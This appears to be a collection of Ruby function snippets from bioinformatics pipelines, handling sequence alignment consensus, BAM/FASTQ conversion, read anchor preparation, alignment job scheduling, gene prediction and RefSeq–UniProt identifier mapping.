"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def before_results(controller_params)\n @num_seqs = 0\n @header = []\n @aln_blocks = []\n \n resfile = File.join(job_dir, jobid+\".out\")\n raise(\"ERROR with resultfile!\") if !File.readable?(resfile) || !File.exists?(resfile) || File.zero?(resfile)\n res = IO.readlines(resfile).map {|line| line.chomp}\n \n sequencefile = File.join(job_dir, jobid+\".fasta\")\n seqs = IO.readlines(sequencefile).map {|line| line.chomp}\n \n hits = []\n res.each do |line|\n \thits << line.split(/ /)[0]\n end\n logger.debug \"Hits: #{hits.inspect}\"\n\n seqfile = File.join(job_dir, jobid+\".seq\")\n \n # write one sequencs of each cluster in seqfile\n check = false\n File.open(seqfile, 'w') do |file|\n seqs.each do |line|\n if (line =~ /^>(.*)$/)\n header = ($1.split(/ /))[0]\n check = false\n if (hits.include?(header) || (header =~ /gi\\|(\\d+)\\|/ && hits.include?($1)))\n file.write(line + \"\\n\")\n check = true\n end\n else\n if check\n file.write(line + \"\\n\")\n end\n end\n end\n end\n\n\n # read in sequences for output\n res = IO.readlines(seqfile).map {|line| line.chomp}\n\n seq = \"\"\n res.each do |line|\n if (line =~ /^>/)\n if (!seq.empty?) then @aln_blocks.push(seq) end\n @header.push(line)\n @num_seqs += 1\n seq = \"\"\n else\n seq += line + \"\\n\"\n end\n end\n if (!seq.empty?) then @aln_blocks.push(seq) end\n \n # write sequences in lines with 80 characters\n @aln_blocks.map! do |seq|\n \ti = 0\n \tnew_seq = \"\"\n \twhile (i+80 < seq.length)\n \t\tnew_seq += seq.slice(i...i+80) + \"\\n\"\n \t\ti += 80\n \tend\n \tnew_seq += seq.slice(i...i+80) + \"\\n\"\n end\n end",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def print_align(io, sequences, labels, opts={})\n opts = {:cutoff => 70, :start => 0, :chars => 20}.merge(opts)\n (start, length, chars) = opts.values_at(:start, :cutoff, :chars)\n spacer = \" \"\n\n if opts[:template]\n sequences.unshift(opts[:template])\n labels.unshift(opts[:template_label])\n end\n\n all_stats = Array.new(6,0)\n loop do\n fin = false\n\n max_length = 0\n lines = []\n consensus_line = \"\"\n fragments = sequences.map do |string|\n fin = (start >= string.length )\n break if fin\n\n string_frag = string[start, length]\n\n string_frag\n end ; break if fin\n\n doubles = fragments.zip(labels)\n\n doubles = doubles.select {|frag, _| (frag.size > 0) && (frag =~ /[^-]/) }\n\n max_length = doubles.map {|frag, _| frag.size }.max\n\n (cs, stats) = consensus_string_and_stats( doubles.map {|frag,_| frag } )\n all_stats = all_stats.zip(stats).map {|a,b| a + b }\n\n doubles.push( [cs, \"<CONSENSUS>\"] )\n\n lines = doubles.map {|frag, label| [exactly_chars(label, chars),spacer,frag].join }\n\n ## the counters at the top of the line\n start_s = start.to_s\n finish_s = (start + max_length).to_s\n count_line_gap = max_length - (start_s.size + finish_s.size)\n count_line = [start_s, spacer]\n unless count_line_gap < 1\n count_line << \" \" * count_line_gap\n end\n io.puts [exactly_chars(\"\", chars), spacer, count_line.join].join\n\n io.puts lines.join(\"\\n\")\n\n io.puts \" \" # separator between lines\n start += length\n end\n end",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
"def process()\n # For lanes that don't need alignment, run post run and exit\n if @reference.eql?(\"sequence\")\n puts \"No alignment to perform since reference is \\\"sequence\\\"\"\n puts \"Running postrun script\"\n runPostRunCmd(\"\")\n exit 0\n end\n\n outputFile1 = @sequenceFiles[0] + \".sai\"\n\n alnCmd1 = buildAlignCommand(@sequenceFiles[0], outputFile1) \n obj1 = Scheduler.new(@fcAndLane + \"_aln_Read1\", alnCmd1)\n obj1.setMemory(@maxMemory)\n obj1.setNodeCores(@cpuCores)\n obj1.setPriority(@priority)\n obj1.runCommand()\n alnJobID1 = obj1.getJobName()\n\n # paired end flowcell\n if @isFragment == false\n outputFile2 = @sequenceFiles[1] + \".sai\"\n alnCmd2 = buildAlignCommand(@sequenceFiles[1], outputFile2)\n obj2 = Scheduler.new(@fcAndLane + \"_aln_Read2\", alnCmd2)\n obj2.setMemory(@maxMemory)\n obj2.setNodeCores(@cpuCores)\n obj2.setPriority(@priority)\n obj2.runCommand()\n alnJobID2 = obj2.getJobName()\n\n sampeCmd = buildSampeCommand(outputFile1, outputFile2, @sequenceFiles[0],\n @sequenceFiles[1])\n obj3 = Scheduler.new(@fcAndLane + \"_sampe\", sampeCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.setDependency(alnJobID2)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n else\n # Flowcell is fragment\n samseCmd = buildSamseCommand(outputFile1, @sequenceFiles[0])\n obj3 = Scheduler.new(@fcAndLane + \"_samse\", samseCmd)\n obj3.setMemory(@lessMemory)\n obj3.setNodeCores(@minCpuCores)\n obj3.setPriority(@priority)\n obj3.setDependency(alnJobID1)\n obj3.runCommand()\n makeSamJobName = obj3.getJobName()\n end\n\n # Sort a BAM\n sortBamCmd = sortBamCommand()\n obj5 = Scheduler.new(@fcAndLane + \"_sortBam\", sortBamCmd)\n obj5.setMemory(@lessMemory)\n obj5.setNodeCores(@minCpuCores)\n obj5.setPriority(@priority)\n obj5.setDependency(makeSamJobName)\n obj5.runCommand()\n sortBamJobName = obj5.getJobName() \n\n # Mark duplicates on BAM\n markedDupCmd = markDupCommand()\n obj6 = Scheduler.new(@fcAndLane + \"_markDupBam\", markedDupCmd)\n obj6.setMemory(@lessMemory)\n obj6.setNodeCores(@minCpuCores)\n obj6.setPriority(@priority)\n obj6.setDependency(sortBamJobName)\n obj6.runCommand()\n markedDupJobName = obj6.getJobName()\n prevCmd = markedDupJobName\n\n # Filter out phix reads\n if @filterPhix == true\n phixFilterCmd = filterPhixReadsCmd(@markedBam)\n objX = Scheduler.new(@fcAndLane + \"_phixFilter\", phixFilterCmd)\n objX.setMemory(@lessMemory)\n objX.setNodeCores(@minCpuCores)\n objX.setPriority(@priority)\n objX.setDependency(prevCmd)\n objX.runCommand()\n phixFilterJobName = objX.getJobName()\n prevCmd = phixFilterJobName\n end\n\n # Fix mate information for paired end FC\n if @isFragment == false\n fixMateCmd = fixMateInfoCmd()\n objY = Scheduler.new(@fcAndLane + \"_fixMateInfo\" + @markedBam, fixMateCmd)\n objY.setMemory(@lessMemory)\n objY.setNodeCores(@minCpuCores)\n objY.setPriority(@priority)\n objY.setDependency(prevCmd)\n objY.runCommand()\n fixMateJobName = objY.getJobName()\n prevCmd = fixMateJobName\n end\n\n # Fix unmapped reads. When a read aligns over the boundary of two\n # chromosomes, BWA marks this read as unmapped but does not reset CIGAR to *\n # and mapping quality zero. This causes picard's validator to complain.\n # Hence, we fix that anomaly here.\n fixCIGARCmd = buildFixCIGARCmd(@markedBam)\n fixCIGARObj = Scheduler.new(@fcAndLane + \"_fixCIGAR\" + @markedBam, fixCIGARCmd)\n fixCIGARObj.setMemory(@lessMemory)\n fixCIGARObj.setNodeCores(@minCpuCores)\n fixCIGARObj.setPriority(@priority)\n fixCIGARObj.setDependency(prevCmd)\n fixCIGARObj.runCommand()\n fixCIGARJobName = fixCIGARObj.getJobName()\n prevCmd = fixCIGARJobName\n\n # Calculate Alignment Stats\n mappingStatsCmd = calculateMappingStats()\n obj7 = Scheduler.new(@fcAndLane + \"_AlignStats\", mappingStatsCmd)\n obj7.setMemory(@lessMemory)\n obj7.setNodeCores(@minCpuCores)\n obj7.setPriority(@priority)\n obj7.setDependency(prevCmd)\n obj7.runCommand()\n runStatsJobName = obj7.getJobName()\n prevCmd = runStatsJobName\n\n if @chipDesign != nil && !@chipDesign.empty?()\n captureStatsCmd = buildCaptureStatsCmd()\n capStatsObj = Scheduler.new(@fcAndLane + \"_CaptureStats\", captureStatsCmd)\n capStatsObj.setMemory(@lessMemory)\n capStatsObj.setNodeCores(@minCpuCores)\n capStatsObj.setPriority(@priority)\n capStatsObj.setDependency(prevCmd)\n capStatsObj.runCommand()\n capStatsJobName = capStatsObj.getJobName()\n prevCmd = capStatsJobName\n end\n\n # Hook to run code after final BAM is generated\n runPostRunCmd(prevCmd)\n end",
"def create_cds_multi_fasta_file(options)\n require 'bioutils/rich_sequence_utils'\n require 'bioutils/glimmer'\n extend Glimmer\n\n default_options = {\n :cds_multi_fasta_file => \"cds_proteins.fas\",\n :verbose => false\n }\n options.reverse_merge!(default_options)\n\n options = MethodArgumentParser::Parser.check_options options do\n option :root_folder, :required => true, :type => :string\n option :cds_multi_fasta_file, :required => true, :type => :string\n option :sequence_files, :required => true, :type => :array\n\n end\n\n Dir.chdir(options[:root_folder])\n\n files_with_cds = Array.new # a list of files containing\n options[:sequence_files].each do |sequence_file|\n sequence_format = guess_sequence_format(sequence_file)\n if sequence_format == :fasta\n if options[:training_model_prefix]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => options[:training_model_prefix],:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n elsif options[:training_sequence_path]\n model_file_prefix = File.basename(options[:training_sequence_path], File.extname(options[:training_sequence_path])) + \"_glimmer\"\n if File.exists?(model_file_prefix + \".icm\")\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training model ....\"\n else\n print \".\"\n end\n run_glimmer_using_model(:input_sequence_path => sequence_file, :prefix => model_file_prefix,:glimmer_dir_path => options[:glimmer_dir], :suppress_messages => true)\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \"_glimmer.predict\"\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using training sequence ....\"\n else\n print \".\"\n end\n predict_file = predict_genes_using_glimmer(:input_sequence_path => sequence_file,\n :rich_sequence_training_path => options[:training_sequence_path],\n :glimmer_dir_path => options[:glimmer_dir],\n :suppress_messages => true)\n end\n else\n if options[:verbose]\n puts \"Predicting genes for file #{sequence_file} using iterated glimmer....\"\n else\n print \".\"\n end\n predict_using_iterated_glimmer(:suppress_messages => true, :input_sequence_path => sequence_file, :glimmer_predict_filename => File.basename(sequence_file, File.extname(sequence_file)),:glimmer_dir_path => options[:glimmer_dir])\n predict_file = File.basename(sequence_file, File.extname(sequence_file)) + \".predict\"\n end\n if options[:verbose]\n puts \"Converting #{sequence_file} glimmer prediction to a genbank file ....\"\n else\n print \".\"\n end\n glimmer_genbank_file = glimmer_prediction_to_rich_sequence_file(:suppress_messages => true, :glimmer_predict_file => predict_file, :input_sequence_path => sequence_file)\n files_with_cds << glimmer_genbank_file\n else\n files_with_cds << sequence_file\n end\n end\n\n cds_multi_fasta_protein_file = File.open(options[:cds_multi_fasta_file], \"w\")\n read_cds_and_write_to_file(files_with_cds, cds_multi_fasta_protein_file)\n processing_indicator(5)\n\n cds_multi_fasta_protein_file.close\n end",
"def map_tgup_by_proteinid()\n # output unmatch list for map by gene_id (prefix of gene_id is first char of gene_id. (\"1\", \"2\", ..))\n refg_output = {}\n FileUtils.mkdir_p(\"#{$prepare_dir}/refg\") unless File.exist?(\"#{$prepare_dir}/refg\")\n (1..9).each do |prefix|\n refg_output[prefix.to_s] = File.open(\"#{$prepare_dir}/refg/#{prefix.to_s}.dat\", \"w\")\n end\n\n output_header\n\n # try mapping the same prefix of RefSeq data and UniProt data(for performance)\n Dir.glob(\"#{$prepare_dir}/refp/*.dat\") do |input_file|\n # parse data\n refseq_gene_list = []\n protein_id_prefix = input_file.split(\"/\").last.split(\"\\.\").first\n puts \"protein_id prefix: #{protein_id_prefix}\"\n File.open(input_file) do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n gene_id_prefix = columns[4].nil? ? \"\" : columns[4][0]\n refseq_gene_list.push({taxid: columns[0], gene_rsrc: columns[1], gene_label: columns[2], protein_id: columns[3], gene_id: columns[4], gene_id_prefix: gene_id_prefix})\n end\n end\n\n $count_nc += refseq_gene_list.size if protein_id_prefix == \"no_protein_id\" # no protein_id on RefSeq\n up_list = load_up_refp(protein_id_prefix) # get same prefix data from UniProt\n\n refseq_gene_list.each do |refseq_data|\n match = false\n output_tax(refseq_data) # output all gene-tax turtle\n unless up_list.nil? # exist prefix on UniProt\n match_list = up_list[refseq_data[:protein_id]]\n unless match_list.nil? # match some uniprot_ids\n match_list.each do |up_info|\n if refseq_data[:taxid] == up_info[:taxid] # ignore unmatch tax\n output_idmap(refseq_data, up_info[:upid])\n match = true\n else # match protein_id but not match tax_id\n output_uptax(up_info)\n $taxup_list[up_info[:taxid]] = true\n $tax_mismatch[\"#{refseq_data[:taxid]}-#{up_info[:taxid]} : #{refseq_data[:protein_id]}\"] = true\n end\n end\n end\n end\n if match == false\n if refseq_data[:gene_id_prefix].nil? ||refseq_data[:gene_id_prefix] == \"\" # can't salvage it by gene_id.\n $no_up += 1\n else # output a file to each prefix of gene_id that can be salvaged by gene_id\n line = [refseq_data[:taxid], refseq_data[:gene_rsrc], refseq_data[:gene_label], refseq_data[:protein_id], refseq_data[:gene_id], refseq_data[:gene_id_prefix]]\n refg_output[refseq_data[:gene_id_prefix]].puts(line.join(\"\\t\"))\n end\n end\n $count += 1\n end\n end\n refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def write_gff_files(gene,fo,f1,f2)\r\n bioseq_seq, chr_id, chr_cord = obtain_data_from_ebi(gene) \r\n target_hash = obtain_target_from_seq(bioseq_seq)\r\n create_features_ensembl_seq_obj(bioseq_seq,target_hash)\r\n chr_target_hash=change_cord(target_hash,chr_cord)\r\n if target_hash.empty?\r\n f1.puts \"#{gene} \\n\"\r\n else\r\n #for chr gff file, #this is for the parent gene chr_id,. --> source, \"gene\", the coordinates in the chr, . --> score, strand, . --> phase, gene_id\r\n f2.puts \"#{chr_id}\\t.\\tgene\\t#{chr_cord[0]}\\t#{chr_cord[1]}\\t.\\t+\\t.\\tID=#{gene}\"\r\n end\r\n #this is for the chromosomas, chr_id, . --> source, featuretype, cordinates of the target, . --> score, strand, . --> phase, exon id and the Parent identifiers, ID=exon00001;Parent=mrna0001\r\n chr_target_hash.each do |key,value|\r\n f2.puts \"#{chr_id}\\t.\\tinterior coding exon\\t#{key[0]}\\t#{key[1]}\\t.\\t#{value[1]}\\t.\\t#{value[0]};Parent=#{gene}\"\r\n end\r\n # each loop for write in the gff file\r\n bioseq_seq.features.each do |feature|\r\n featuretype = feature.feature\r\n next unless featuretype == \"target_CTTCTT\"\r\n position = feature.position\r\n qual = feature.assoc \r\n positionss= position.split(\"..\")\r\n fo.puts\"#{gene}\\t.\\t#{featuretype}\\t#{positionss[0]}\\t#{positionss[1]}\\t.\\t#{qual[\"strand\"]}\\t.\\t#{qual[\"interior coding exon\"]}\"\r\n end\r\nend",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def getFtsSequences\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n loc = \"c#{ft.locations[0].to_s}\" if ft.locations[0].strand == -1\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\nend",
"def bam2fastq(input_file, output_file, phred_quality)\n \t\tFile.open(output_file, 'w') do |output|\n\t\t\tinput_file.each do |line|\n \t\t\tline = line.strip.split(/\\s+/)\n \n \t\t\tflag = line[1].to_i\n \t\t\tflag & 0x40 > 0 ? mate = '1' : mate = '2'\n \t\t\t\n \t\t\tqname, sequence, quality = line[0], line[9], line[10] \n \t\t\toutput.puts \"@#{qname}/#{mate}\", sequence, '+', quality if Alignment.quality_ok?(quality, phred_quality)\n \t\tend\n \tend\n \t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Converted unmapped.bam into fastq-format.\"\t\n\tend",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def before_perform\n @outdir = job.job_dir.to_s\n @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".in\" \n # still has to be generated\n @outfile = @basename+\".frags\"\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n @predict_ta = params['ta']\n reformat(@informat, \"fas\", @infile)\n @commands = []\n \n \n end",
